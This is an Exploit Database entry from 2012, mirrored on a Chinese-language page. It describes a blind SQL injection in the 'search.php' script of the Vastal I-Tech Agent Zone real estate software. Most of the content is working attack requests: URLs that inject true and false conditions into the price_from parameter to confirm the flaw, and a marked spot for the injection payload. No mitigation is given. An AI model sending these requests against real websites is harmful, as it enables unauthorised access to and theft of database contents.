Vastal I-Tech Agent Zone – ‘search.php’ Blind SQL Injection

• Exploit Database
• 13 阅读

• 作者： Cagri Tepebasili
  日期： 2012-01-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18441/

• Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
  
  
  # Date: 31.01.2012
  
  # Author: Cagri Tepebasili
  
  # Software : http://www.vastal.com/agent-zone-real-estate-script.html
  
  # Tested on: Linux Mint 12
  
  #####################################################################################################################
  
  The First Step >>>
  http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
  
  The Second Step >>>
  http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
  
  Injection >>>
  http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
  
  Greetz : MythSEC <<<